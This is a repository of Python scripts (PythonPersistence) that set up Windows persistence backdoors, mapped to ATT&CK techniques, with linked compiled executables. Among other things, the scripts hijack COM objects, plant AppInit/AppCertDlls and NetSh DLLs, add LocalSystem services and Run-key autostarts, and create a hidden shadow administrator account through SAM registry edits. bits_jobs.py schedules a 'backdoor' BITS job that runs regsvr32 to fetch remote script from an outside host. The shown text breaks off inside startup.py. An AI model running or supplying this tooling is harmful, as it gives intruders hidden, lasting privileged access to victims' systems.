├── AppCertDlls.py ├── AppInit_DLLs.py ├── NetSh.py ├── README.md ├── account.py ├── add_service_cmd.py ├── bits_jobs.py ├── com_Hijack.py ├── com_explorer_Hijack.py ├── func.py ├── logger.py ├── modify_service_reg.py ├── release ├── NetSh.exe ├── README.md ├── account.exe ├── add_service_cmd.exe ├── bits_jobs_64.exe ├── com_Hijack_64.exe ├── com_explorer_Hijack_64.exe ├── startup.exe └── winlogon_helper_dll.exe ├── startup.py └── winlogon_helper_dll.py /AppCertDlls.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | # -*- coding: utf-8 -*- 3 | # @Time : 2020.02.05 4 | # @Author : Lhaihai 5 | # @File : AppCertDlls 6 | # @Software: PyCharm 7 | # @Blog : http://www.Lhaihai.top 8 | """ 9 | Description : 修改注册表的 AppCertDlls,需要管理员权限 10 | """ 11 | 12 | import pyregedit.pyregedit as pyregedit 13 | from logger import factory_logger 14 | logger = factory_logger('AppCertDlls') 15 | 16 | def set_AppCertDlls(cmd): 17 | root = pyregedit.HKEY_LOCAL_MACHINE 18 | path = r"System\CurrentControlSet\Control\Session Manager\AppCertDlls" 19 | reg = pyregedit.RegEdit(root,path) 20 | 21 | #判断键是否存在 22 | if reg.check_key(): 23 | pass 24 | else: 25 | #创建键 26 | reg.create_key() 27 | logger.info('创建AppCertDlls键') 28 | 29 | try: 30 | reg.create_value('Default',pyregedit.REG_SZ,cmd) 31 | logger.info('插入注册表成功') 32 | except: 33 | logger.error('插入注册表失败') 34 | 35 | 36 | def clear_AppCertDlls(): 37 | root = pyregedit.HKEY_LOCAL_MACHINE 38 | path = r"System\CurrentControlSet\Control\Session Manager\AppCertDlls" 39 | reg = pyregedit.RegEdit(root,path) 40 | 41 | #判断键是否存在 42 | if reg.check_key(): 43 | reg.delete_current_key() 44 | logger.info('清除') 45 | else: 46 | logger.info('AppCertDlls键不存在') 47 | 48 | 49 | if __name__ == '__main__': 50 | # set_AppCertDlls('c:\\64.exe') 51 | clear_AppCertDlls() -------------------------------------------------------------------------------- /AppInit_DLLs.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | # -*- coding: utf-8 -*- 3 | # @Time : 2020.02.05 4 | # @Author : Lhaihai 5 | # @File : AppInit_DLLs 6 | # @Software: PyCharm 7 | # @Blog : http://www.Lhaihai.top 8 | """ 9 | Description : 10 | """ 11 | 12 | import pyregedit.pyregedit as pyregedit 13 | from logger import factory_logger 14 | logger = factory_logger('AppInit_DLLs') 15 | 16 | def set_AppInit_DLLs(cmd): 17 | root = pyregedit.HKEY_LOCAL_MACHINE 18 | path = r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" 19 | reg = pyregedit.RegEdit(root,path) 20 | 21 | #判断键是否存在 22 | if reg.check_key(): 23 | try: 24 | reg.create_value('AppInit_DLLs', pyregedit.REG_SZ, cmd) 25 | reg.create_value('LoadAppInit_DLLs', pyregedit.REG_DWORD, 0x01) 26 | logger.info('插入注册表成功') 27 | except: 28 | logger.error('插入注册表失败') 29 | else: 30 | logger.info('需要管理员权限!') 31 | return 32 | 33 | 34 | 35 | def clear_AppInit_DLLs(): 36 | root = pyregedit.HKEY_LOCAL_MACHINE 37 | path = r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" 38 | reg = pyregedit.RegEdit(root,path) 39 | 40 | #判断键是否存在 41 | if reg.check_key(): 42 | reg.create_value('AppInit_DLLs', pyregedit.REG_SZ, "") 43 | reg.create_value('LoadAppInit_DLLs', pyregedit.REG_DWORD, 0x0) 44 | logger.info('清除') 45 | else: 46 | logger.info('需要管理员权限!') 47 | return 48 | 49 | 50 | if __name__ == '__main__': 51 | # set_AppInit_DLLs('c:\\64.exe') 52 | clear_AppInit_DLLs() -------------------------------------------------------------------------------- /NetSh.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | # -*- coding: utf-8 -*- 3 | # @Time : 2020.02.05 4 | # @Author : Lhaihai 5 | # @File : netsh 6 | # @Software: PyCharm 7 | # @Blog : http://www.Lhaihai.top 8 | """ 9 | Description : Netsh是Windows实用程序,管理员可以使用它来执行与系统的网络配置有关的任务,并在基于主机的Windows防火墙上进行修改。可以通过使用DLL文件来扩展Netsh功能。此功能使红队可以使用此工具来加载任意DLL,以实现代码执行并因此实现持久性。但是,此技术的实现需要本地管理员级别的特权。 10 | """ 11 | 12 | import pyregedit.pyregedit as pyregedit 13 | from logger import factory_logger 14 | logger = factory_logger('NetSh') 15 | from startup import set_user,clear_user 16 | import sys,os 17 | 18 | def init(): 19 | root = pyregedit.HKEY_LOCAL_MACHINE 20 | path = r"SOFTWARE\Microsoft\NetSh" 21 | reg = pyregedit.RegEdit(root,path) 22 | return reg 23 | 24 | def set_NetSh(cmd): 25 | reg = init() 26 | 27 | if reg.check_key(): 28 | try: 29 | value_name = str(cmd).split('\\')[-1].split('.')[0] 30 | reg.create_value(value_name, pyregedit.REG_SZ, cmd) 31 | set_user(r'netsh.exe') 32 | logger.info('插入注册表成功') 33 | except: 34 | logger.error('插入注册表失败') 35 | else: 36 | logger.info('需要管理员权限!') 37 | return 38 | 39 | 40 | 41 | def clear_NetSh(cmd): 42 | reg = init() 43 | #判断键是否存在 44 | if reg.check_key(): 45 | value_name = str(cmd).split('\\')[-1].split('.')[0] 46 | reg.delete_value(value_name) 47 | clear_user() 48 | logger.info('清除') 49 | else: 50 | logger.info('需要管理员权限!') 51 | return 52 | 53 | if __name__ == '__main__': 54 | action = int(sys.argv[1]) if len(sys.argv) > 1 else '' 55 | cmd = sys.argv[2] if len(sys.argv) > 2 else '' 56 | if action == 'set' and cmd: 57 | if ':' not in cmd and '\\' not in cmd: 58 | path = os.getcwd() + '\\' + cmd 59 | if os.path.exists(path): 60 | set_NetSh(path) 61 | else: 62 | logger.error(cmd + '文件不存在') 63 | else: 64 | set_NetSh(cmd) 65 | elif action == 'clear' and cmd: 66 | clear_NetSh(cmd) 67 | else: 68 | print("NetSh.exe set 64.dll") 69 | print("NetSh.exe clear 64.dll") -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # PythonPersistence 2 | python3 写的一些权限维持脚本 3 | 4 | | ATT&CK 编号 | 名称 | 参数 | 5 | | --------------------------------------------------- | ------------------- | ----------- | 6 | | [T1060](https://attack.mitre.org/techniques/T1060/) | startup | exe,command | 7 | | [T1182](https://attack.mitre.org/techniques/T1182/) | AppCertDlls | dll | 8 | | [T1103](https://attack.mitre.org/techniques/T1103/) | AppInit_DLLs | dll | 9 | | [T1128](https://attack.mitre.org/techniques/T1128/) | NetSh | dll | 10 | | [T1031](https://attack.mitre.org/techniques/T1031/) | modify_service | exe | 11 | | [T1050](https://attack.mitre.org/techniques/T1050/) | add_service_cmd | exe | 12 | | [T1050](https://attack.mitre.org/techniques/T1050/) | add_service_win32 | exe,command | 13 | | [T1122](https://attack.mitre.org/techniques/T1122/) | com_Hijack | dll | 14 | | [T1122](https://attack.mitre.org/techniques/T1122/) | com_explorer_Hijack | dll | 15 | | [T1004](https://attack.mitre.org/techniques/T1004/) | winlogon_helper_dll | exe | 16 | | [T1197](https://attack.mitre.org/techniques/T1197/) | bitsadmin | exe,command | 17 | | [T1136](https://attack.mitre.org/techniques/T1136/) | account | user | 18 | 19 | 注册表修改使用的是win32 api,可用在64和32为系统 20 | -------------------------------------------------------------------------------- /account.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | # -*- coding: utf-8 -*- 3 | # @Time : 2020.02.10 4 | # @Author : Lhaihai 5 | # @File : account.py 6 | # @Software: PyCharm 7 | # @Blog : http://www.Lhaihai.top 8 | """ 9 | Description : 10 | """ 11 | 12 | import pyregedit.pyregedit as pyregedit 13 | from logger import factory_logger 14 | logger = factory_logger('account') 15 | import subprocess 16 | from func import content_decode 17 | import sys 18 | 19 | def create_accout(username,password): 20 | command = 'net user {} {} /add'.format(username,password) 21 | r = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT) 22 | rr = content_decode(r.stdout) 23 | logger.debug(rr) 24 | 25 | def delete_accout(username): 26 | command = 'net user {} /delete'.format(username) 27 | r = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT) 28 | rr = content_decode(r.stdout) 29 | logger.debug(rr) 30 | 31 | def get_account_num(username): 32 | root = pyregedit.HKEY_LOCAL_MACHINE 33 | path = r"SAM\SAM\Domains\Account\Users\Names\\"+username 34 | reg = pyregedit.RegEdit(root,path) 35 | 36 | #判断键是否存在 37 | if reg.check_key(): 38 | d = reg.get_value("")[1] 39 | return d 40 | else: 41 | #创建键 42 | # key = reg.create_key() 43 | pass 44 | 45 | def get_admin_account_value(): 46 | root = pyregedit.HKEY_LOCAL_MACHINE 47 | path = r"SAM\SAM\Domains\Account\Users\000001F4" 48 | reg = pyregedit.RegEdit(root,path) 49 | 50 | #判断键是否存在 51 | if reg.check_key(): 52 | F = reg.get_value("F")[0] 53 | # V = reg.get_value("V")[0] 54 | return F 55 | else: 56 | return 57 | 58 | def set_account(username,password): 59 | 60 | create_accout(username,password) 61 | 62 | #保存账号的类型 63 | account_type = get_account_num(username) 64 | 65 | root = pyregedit.HKEY_LOCAL_MACHINE 66 | path = r"SAM\SAM\Domains\Account\Users\\"+'00000'+str(hex(account_type))[2:] 67 | reg = pyregedit.RegEdit(root,path) 68 | 69 | #判断键是否存在 70 | if reg.check_key(): 71 | admin_F = get_admin_account_value() 72 | V = reg.get_value("V")[0] 73 | # ForcePasswordReset = reg.get_value("ForcePasswordReset")[0] 74 | # SupplementalCredentials = reg.get_value("SupplementalCredentials")[0] 75 | else: 76 | logger.error("用户不存在") 77 | return 78 | 79 | delete_accout(username) 80 | 81 | #恢复注册表 82 | reg.create_value("F",pyregedit.REG_BINARY,admin_F) 83 | reg.create_value("V",pyregedit.REG_BINARY,V) 84 | # reg.create_value("ForcePasswordReset",pyregedit.REG_BINARY,ForcePasswordReset) 85 | # reg.create_value("SupplementalCredentials",pyregedit.REG_BINARY,SupplementalCredentials) 86 | 87 | path = r"SAM\SAM\Domains\Account\Users\Names\\" + username 88 | reg = pyregedit.RegEdit(root, path) 89 | reg.create_value("", account_type, "".encode()) 90 | 91 | logger.info('影子账号创建成功') 92 | 93 | def clear_account(username): 94 | account_type = get_account_num(username) 95 | if not account_type : 96 | logger.info("未植入影子后门") 97 | return 98 | 99 | root = pyregedit.HKEY_LOCAL_MACHINE 100 | path = r"SAM\SAM\Domains\Account\Users\Names\\" + username 101 | reg = pyregedit.RegEdit(root, path) 102 | try: 103 | reg.delete_current_key() 104 | except: 105 | pass 106 | 107 | path = r"SAM\SAM\Domains\Account\Users\\"+'00000'+str(hex(account_type))[2:] 108 | reg = pyregedit.RegEdit(root, path) 109 | try: 110 | reg.delete_current_key() 111 | except: 112 | pass 113 | 114 | logger.info("影子账号清除成功") 115 | 116 | 117 | if __name__ == '__main__': 118 | action = sys.argv[1] if len(sys.argv) > 1 else '' 119 | if action == 'set' and len(sys.argv) == 4: 120 | set_account(sys.argv[2], sys.argv[3]) 121 | elif action == 'clear' and len(sys.argv) == 3 : 122 | clear_account(sys.argv[2]) 123 | else: 124 | print('account.exe set admin$ qwe123!@#') 125 | print('account.exe clear admin$') 126 | -------------------------------------------------------------------------------- /add_service_cmd.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | # -*- coding: utf-8 -*- 3 | # @Time : 2020.02.05 4 | # @Author : Lhaihai 5 | # @File : new_service_cmd.py 6 | # @Software: PyCharm 7 | # @Blog : http://blog.Lhaihai.wang 8 | """ 9 | Description : 通过 CMD 创建服务 10 | """ 11 | 12 | from logger import factory_logger 13 | logger = factory_logger('添加服务') 14 | import subprocess 15 | from func import content_decode 16 | from startup import set_user,clear_user 17 | import sys,os 18 | 19 | def add_service_cmd(cmd,service): 20 | command = 'sc create {} binpath= "cmd.exe /k {}" start= "auto" obj= "LocalSystem"'.format(service,cmd) 21 | r = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT) 22 | rr = content_decode(r.stdout) 23 | if '5' in rr: 24 | logger.error('需要管理员权限!') 25 | return 26 | elif 'CreateService' in rr: 27 | set_user('sc start '+service) 28 | logger.info('创建服务成功') 29 | 30 | def add_service_powershell(cmd,service): 31 | command = 'powershell.exe New-Service -Name "{}" -BinaryPathName "{}" -Description "PentestLaboratories" -StartupType Automatic'.format(service,cmd) 32 | r = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT) 33 | rr = content_decode(r.stdout) 34 | if 'PermissionDenied' in rr: 35 | logger.error('需要管理员权限!') 36 | return 37 | elif 'DisplayName' in rr: 38 | set_user('sc start '+service) 39 | logger.info('创建服务成功') 40 | 41 | def delete_service(service): 42 | command = 'sc delete {}'.format(service) 43 | r = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT) 44 | rr = content_decode(r.stdout) 45 | logger.debug(rr) 46 | clear_user() 47 | 48 | def start_service(service): 49 | command = 'sc start {}'.format(service) 50 | r = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT) 51 | rr = content_decode(r.stdout) 52 | logger.debug(rr) 53 | 54 | def stop_service(service): 55 | command = 'sc stop {}'.format(service) 56 | r = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT) 57 | rr = content_decode(r.stdout) 58 | logger.debug(rr) 59 | 60 | if __name__ == '__main__': 61 | # add_service_cmd('c:\\64.exe','pentestlab') 62 | # add_service_powershell('c:\\64.exe','pentestlab') 63 | # start_service('pentestlab') 64 | # stop_service('pentestlab') 65 | # delete_service('pentestlab') 66 | action = sys.argv[1] if len(sys.argv) > 1 else '' 67 | if action == 'set' and len(sys.argv) == 4: 68 | cmd = sys.argv[2] 69 | if ':' not in cmd and '\\' not in cmd: 70 | path = os.getcwd() + '\\' + cmd 71 | if os.path.exists(path): 72 | add_service_cmd(path,sys.argv[3]) 73 | else: 74 | logger.error(cmd + '文件不存在') 75 | else: 76 | add_service_cmd(cmd,sys.argv[3]) 77 | 78 | elif action == 'clear' and len(sys.argv) == 3: 79 | service = sys.argv[2] 80 | delete_service(service) 81 | elif action == 'start' and len(sys.argv) == 3: 82 | service = sys.argv[2] 83 | start_service(service) 84 | elif action == 'stop' and len(sys.argv) == 3: 85 | service = sys.argv[2] 86 | stop_service(service) 87 | else: 88 | print('add_service_cmd.exe set cmd servicename ') 89 | print('add_service_cmd.exe clear servicename') 90 | print('add_service_cmd.exe start servicename') 91 | print('add_service_cmd.exe stop servicename') 92 | -------------------------------------------------------------------------------- /bits_jobs.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | # -*- coding: utf-8 -*- 3 | # @Time : 2020.02.06 4 | # @Author : Lhaihai 5 | # @File : bits_jobs 6 | # @Software: PyCharm 7 | # @Blog : http://www.Lhaihai.top 8 | """ 9 | Description : 10 | """ 11 | 12 | from logger import factory_logger 13 | logger = factory_logger('bitsadmin') 14 | import subprocess 15 | from func import content_decode 16 | import sys 17 | 18 | 19 | def add_bitsadmin_cmd(cmd): 20 | command = r'bitsadmin /create backdoor && bitsadmin /addfile backdoor C:\Windows\System32\calc.exe %temp%\calc.exe && bitsadmin /SetNotifyCmdLine backdoor cmd.exe "cmd.exe /c {}" && bitsadmin /SetMinRetryDelay "backdoor" 60 && bitsadmin /resume backdoor'.format(cmd) 21 | r = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT) 22 | rr = content_decode(r.stdout) 23 | logger.info(rr) 24 | 25 | def add_bitsadmin_regsvr32(cmd): 26 | command = r'bitsadmin /create backdoor && bitsadmin /addfile backdoor C:\Windows\System32\calc.exe %temp%\calc.exe && bitsadmin /SetNotifyCmdLine backdoor {} && bitsadmin /resume backdoor'.format(cmd) 27 | r = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT) 28 | rr = content_decode(r.stdout) 29 | logger.info(rr) 30 | 31 | def clear_bitsadmin_cmd(): 32 | command = r'bitsadmin /cancel backdoor' 33 | r = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT) 34 | rr = content_decode(r.stdout) 35 | logger.info(rr) 36 | 37 | 38 | if __name__ == '__main__': 39 | tmp = r'regsvr32 /s /n /u /i:http://192.168.190.139:8080/oYfuhgo.sct scrobj.dll' 40 | action = sys.argv[1] if len(sys.argv) > 1 else '' 41 | if action == 'set': 42 | if len(sys.argv) == 3: 43 | cmd = sys.argv[2] 44 | else: 45 | cmd = tmp 46 | add_bitsadmin_cmd(cmd) 47 | elif action == 'clear': 48 | clear_bitsadmin_cmd() 49 | else: 50 | print('bitsadmin_64.exe set \'regsvr32 /s /n /u /i:http://192.168.190.139:8080/oYfuhgo.sct scrobj.dll\'') 51 | print('bitsadmin_64.exe clear') 52 | -------------------------------------------------------------------------------- /com_Hijack.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | # -*- coding: utf-8 -*- 3 | # @Time : 2020.02.05 4 | # @Author : Lhaihai 5 | # @File : com_Hijack 6 | # @Software: PyCharm 7 | # @Blog : http://www.Lhaihai.top 8 | """ 9 | Description : 通过修改CLSID下的注册表键值,实现对CAccPropServicesClass和MMDeviceEnumerator劫持,而系统很多正常程序启动时需要调用这两个实例 10 | """ 11 | 12 | import pyregedit.pyregedit as pyregedit 13 | from logger import factory_logger 14 | logger = factory_logger('com_Hijack') 15 | import shutil 16 | import os 17 | import sys 18 | 19 | defaultpath = 'C:\\Users\\Administrator\\AppData\\Roaming\\Microsoft\\Installer\\{BCDE0395-E52F-467C-8E3D-C4579291692E}' 20 | 21 | def init(): 22 | root = pyregedit.HKEY_CURRENT_USER 23 | path = r"Software\Classes\CLSID\{b5f8350b-0548-48b1-a6ee-88bd00b4a5e7}" 24 | reg = pyregedit.RegEdit(root,path) 25 | if reg.check_key(): 26 | path = r"Software\Classes\CLSID\{b5f8350b-0548-48b1-a6ee-88bd00b4a5e7}\InprocServer32" 27 | reg = pyregedit.RegEdit(root, path) 28 | if reg.check_key(): 29 | pass 30 | else: 31 | reg.create_key() 32 | logger.info('创建了InprocServer32') 33 | else: 34 | reg.create_key() 35 | path = r"Software\Classes\CLSID\{b5f8350b-0548-48b1-a6ee-88bd00b4a5e7}\InprocServer32" 36 | reg = pyregedit.RegEdit(root,path) 37 | reg.create_key() 38 | logger.info('创建了InprocServer32') 39 | return reg 40 | 41 | 42 | def set_com_Hijack(cmd): 43 | 44 | dst = r'C:\Users\Administrator\AppData\Roaming\Microsoft\Installer\{BCDE0395-E52F-467C-8E3D-C4579291692E}\\'+os.path.basename(cmd) 45 | reg = init() 46 | try: 47 | if os.path.isdir(defaultpath): 48 | shutil.copy(cmd, dst) 49 | else: 50 | os.makedirs(defaultpath) 51 | shutil.copy(cmd, dst) 52 | logger.info('创建了{BCDE0395-E52F-467C-8E3D-C4579291692E}目录') 53 | reg.create_value('',pyregedit.REG_SZ,cmd) 54 | reg.create_value('ThreadingModel',pyregedit.REG_SZ,'Apartment') 55 | logger.info('插入注册表成功') 56 | except Exception as e: 57 | logger.error('插入注册表失败') 58 | 59 | def clear_com_Hijack(): 60 | 61 | root = pyregedit.HKEY_CURRENT_USER 62 | path = r"Software\Classes\CLSID\{b5f8350b-0548-48b1-a6ee-88bd00b4a5e7}" 63 | reg = pyregedit.RegEdit(root, path) 64 | 65 | if reg.check_key(): 66 | try: 67 | reg.delete_sub_key('InprocServer32') 68 | reg.delete_current_key() 69 | if os.path.isdir(defaultpath): 70 | shutil.rmtree(defaultpath) 71 | else: 72 | pass 73 | logger.info('清除成功') 74 | except: 75 | logger.error('清除失败') 76 | else: 77 | logger.info('该后门没有植入') 78 | return 79 | 80 | 81 | if __name__ == '__main__': 82 | action = sys.argv[1] if len(sys.argv)>1 else '' 83 | if action == 'set': 84 | cmd = sys.argv[2] 85 | # cmd = r'c:\calcmutex_x64.dll' 86 | if ':' not in cmd and '\\' not in cmd: 87 | path = os.getcwd() + '\\' + cmd 88 | if os.path.exists(path): 89 | set_com_Hijack(path) 90 | else: 91 | logger.error(cmd+'文件不存在') 92 | else: 93 | set_com_Hijack(cmd) 94 | elif action == 'clear': 95 | clear_com_Hijack() 96 | else: 97 | print('com_Hijack_64.exe set calcmutex_x64.dll') 98 | print('com_Hijack_64.exe clear') 99 | -------------------------------------------------------------------------------- /com_explorer_Hijack.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | # -*- coding: utf-8 -*- 3 | # @Time : 2020.02.05 4 | # @Author : Lhaihai 5 | # @File : com_explorer_Hijack 6 | # @Software: PyCharm 7 | # @Blog : http://www.Lhaihai.top 8 | """ 9 | Description : 10 | """ 11 | 12 | import pyregedit.pyregedit as pyregedit 13 | from logger import factory_logger 14 | logger = factory_logger('com_explorer_Hijack') 15 | import os,sys 16 | 17 | def init(): 18 | root = pyregedit.HKEY_CURRENT_USER 19 | path = r"Software\Classes\CLSID\{42aedc87-2188-41fd-b9a3-0c966feabec1}" 20 | reg = pyregedit.RegEdit(root,path) 21 | if reg.check_key(): 22 | path = r"Software\Classes\CLSID\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InprocServer32" 23 | reg = pyregedit.RegEdit(root, path) 24 | if reg.check_key(): 25 | pass 26 | else: 27 | reg.create_key() 28 | logger.info('创建了InprocServer32') 29 | else: 30 | reg.create_key() 31 | path = r"Software\Classes\CLSID\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InprocServer32" 32 | reg = pyregedit.RegEdit(root,path) 33 | reg.create_key() 34 | logger.info('创建了InprocServer32') 35 | return reg 36 | 37 | def set_com_explorer_Hijack(cmd): 38 | 39 | reg = init() 40 | try: 41 | reg.create_value('',pyregedit.REG_SZ,cmd) 42 | reg.create_value('ThreadingModel',pyregedit.REG_SZ,'Apartment') 43 | logger.info('插入注册表成功') 44 | except: 45 | logger.error('插入注册表失败') 46 | 47 | def clear_com_explorer_Hijack(): 48 | 49 | root = pyregedit.HKEY_CURRENT_USER 50 | path = r"Software\Classes\CLSID\{42aedc87-2188-41fd-b9a3-0c966feabec1}" 51 | reg = pyregedit.RegEdit(root, path) 52 | 53 | if reg.check_key(): 54 | try: 55 | reg.delete_sub_key('InprocServer32') 56 | reg.delete_current_key() 57 | logger.info('清除成功') 58 | except: 59 | logger.error('清除失败') 60 | else: 61 | logger.info('该后门没有植入') 62 | return 63 | 64 | if __name__ == '__main__': 65 | action = sys.argv[1] if len(sys.argv) > 1 else '' 66 | if action == 'set': 67 | cmd = sys.argv[2] 68 | # cmd = r'c:\calcmutex_x64.dll' 69 | if ':' not in cmd and '\\' not in cmd: 70 | path = os.getcwd() + '\\' + cmd 71 | if os.path.exists(path): 72 | set_com_explorer_Hijack(path) 73 | else: 74 | logger.error(cmd + '文件不存在') 75 | else: 76 | set_com_explorer_Hijack(cmd) 77 | elif action == 'clear': 78 | clear_com_explorer_Hijack() 79 | else: 80 | print('com_explorer_Hijack_64.exe set calcmutex_x64.dll') 81 | print('com_explorer_Hijack_64.exe clear') -------------------------------------------------------------------------------- /func.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | # -*- coding: utf-8 -*- 3 | # @Time : 2020.02.05 4 | # @Author : Lhaihai 5 | # @File : func.py 6 | # @Software: PyCharm 7 | # @Blog : http://blog.Lhaihai.wang 8 | """ 9 | Description : 10 | """ 11 | 12 | def content_decode(content): 13 | raw_content = content 14 | try: 15 | content = raw_content.decode("utf-8") 16 | except UnicodeError: 17 | try: 18 | content = raw_content.decode("gbk") 19 | except UnicodeError: 20 | try: 21 | content = raw_content.decode("gb2312") 22 | except UnicodeError: 23 | try: 24 | content = raw_content.decode("big5") 25 | except: 26 | print("DecodeHtmlError") 27 | return content -------------------------------------------------------------------------------- /logger.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | # -*- coding: utf-8 -*- 3 | # @Time : 2020.02.04 4 | # @Author : Lhaihai 5 | # @File : logger 6 | # @Software: PyCharm 7 | # @Blog : http://blog.Lhaihai.wang 8 | """ 9 | Description : 10 | """ 11 | import logging 12 | 13 | def factory_logger(name): 14 | 15 | logger = logging.getLogger(name) 16 | logger.setLevel(logging.DEBUG) 17 | 18 | # create console handler and set level to debug 19 | ch = logging.StreamHandler() 20 | ch.setLevel(logging.DEBUG) 21 | 22 | DATE_FORMAT = "%Y-%d-%m %H:%M:%S" 23 | 24 | # create formatter 25 | formatter = logging.Formatter("%(asctime)s - %(name)s - %(levelname)-5s - %(message)s",DATE_FORMAT) 26 | 27 | # add formatter to ch 28 | ch.setFormatter(formatter) 29 | 30 | # add ch to logger 31 | logger.addHandler(ch) 32 | 33 | return logger -------------------------------------------------------------------------------- /modify_service_reg.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | # -*- coding: utf-8 -*- 3 | # @Time : 2020.02.04 4 | # @Author : Lhaihai 5 | # @File : modify_service 6 | # @Software: PyCharm 7 | # @Blog : http://www.Lhaihai.top 8 | """ 9 | Description : 通过注册表修改服务 10 | """ 11 | import pyregedit.pyregedit as pyregedit 12 | from logger import factory_logger 13 | logger = factory_logger('修改服务') 14 | 15 | # 在HKCU的Run 添加 16 | def set_reg_service(cmd,service): 17 | 18 | root = pyregedit.HKEY_LOCAL_MACHINE 19 | path = r"SYSTEM\CurrentControlSet\Services\\" + service 20 | reg = pyregedit.RegEdit(root,path) 21 | 22 | #判断键是否存在 23 | if reg.check_key(): 24 | #获取键(可用于其他操作) 25 | key = reg.get_key() 26 | else: 27 | logger.error(service + '服务不存在') 28 | return 29 | 30 | try: 31 | # reg.create_value('ErrorControl',pyregedit.REG_DWORD,0x01) 32 | # reg.create_value('ObjectName',pyregedit.REG_SZ,'LocalSystem') 33 | reg.create_value('Start',pyregedit.REG_DWORD,0x02) 34 | reg.create_value('Type',pyregedit.REG_DWORD,0x10) 35 | reg.create_value('ImagePath',pyregedit.REG_EXPAND_SZ,cmd) 36 | logger.info('修改服务成功') 37 | except Exception as e: 38 | logger.error('修改服务失败: '+str(e)) 39 | 40 | 41 | if __name__ == '__main__': 42 | set_reg_service(r'cmd.exe /k C:\64.exe xxx','pentestlab') -------------------------------------------------------------------------------- /release/NetSh.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Lhaihai/PythonPersistence/cbba481f7b877e71792200253d159887634857dd/release/NetSh.exe -------------------------------------------------------------------------------- /release/README.md: -------------------------------------------------------------------------------- 1 | 2 | 默认情况下是 64位程序 3 | 32位会在程序名后标记出来 4 | -------------------------------------------------------------------------------- /release/account.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Lhaihai/PythonPersistence/cbba481f7b877e71792200253d159887634857dd/release/account.exe -------------------------------------------------------------------------------- /release/add_service_cmd.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Lhaihai/PythonPersistence/cbba481f7b877e71792200253d159887634857dd/release/add_service_cmd.exe -------------------------------------------------------------------------------- /release/bits_jobs_64.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Lhaihai/PythonPersistence/cbba481f7b877e71792200253d159887634857dd/release/bits_jobs_64.exe -------------------------------------------------------------------------------- /release/com_Hijack_64.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Lhaihai/PythonPersistence/cbba481f7b877e71792200253d159887634857dd/release/com_Hijack_64.exe -------------------------------------------------------------------------------- /release/com_explorer_Hijack_64.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Lhaihai/PythonPersistence/cbba481f7b877e71792200253d159887634857dd/release/com_explorer_Hijack_64.exe -------------------------------------------------------------------------------- /release/startup.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Lhaihai/PythonPersistence/cbba481f7b877e71792200253d159887634857dd/release/startup.exe -------------------------------------------------------------------------------- /release/winlogon_helper_dll.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Lhaihai/PythonPersistence/cbba481f7b877e71792200253d159887634857dd/release/winlogon_helper_dll.exe -------------------------------------------------------------------------------- /startup.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | # -*- coding: utf-8 -*- 3 | # @Time : 2020.02.04 4 | # @Author : Lhaihai 5 | # @File : startup.py 6 | # @Software: PyCharm 7 | # @Blog : http://blog.Lhaihai.wang 8 | """ 9 | Description : Run 自启动 10 | """ 11 | 12 | import pyregedit.pyregedit as pyregedit 13 | from logger import factory_logger 14 | logger = factory_logger('StartUp') 15 | from win32com.shell import shell 16 | import sys,os 17 | 18 | value_name = 'KPhSIluQy' 19 | 20 | # 在HKCU的Run 添加 21 | def set_user(cmd): 22 | root = pyregedit.HKEY_CURRENT_USER 23 | path = r"Software\Microsoft\Windows\CurrentVersion\Run" 24 | reg = pyregedit.RegEdit(root,path) 25 | 26 | if reg.check_key(): 27 | try: 28 | reg.create_value(value_name, pyregedit.REG_SZ, cmd) 29 | logger.info('插入注册表成功') 30 | except: 31 | logger.error('插入注册表失败') 32 | else: 33 | #创建键 34 | logger.error('Run键值不存在') 35 | exit(0) 36 | 37 | def set_user_runonce(cmd): 38 | root = pyregedit.HKEY_CURRENT_USER 39 | path = r"Software\Microsoft\Windows\CurrentVersion\RunOnce" 40 | reg = pyregedit.RegEdit(root,path) 41 | 42 | if reg.check_key(): 43 | try: 44 | reg.create_value(value_name, pyregedit.REG_SZ, cmd) 45 | logger.info('插入注册表成功') 46 | except: 47 | logger.error('插入注册表失败') 48 | else: 49 | #创建键 50 | logger.error('RunOnce 键不存在') 51 | exit(0) 52 | 53 | def set_user_Explorer(cmd): 54 | root = pyregedit.HKEY_CURRENT_USER 55 | path = 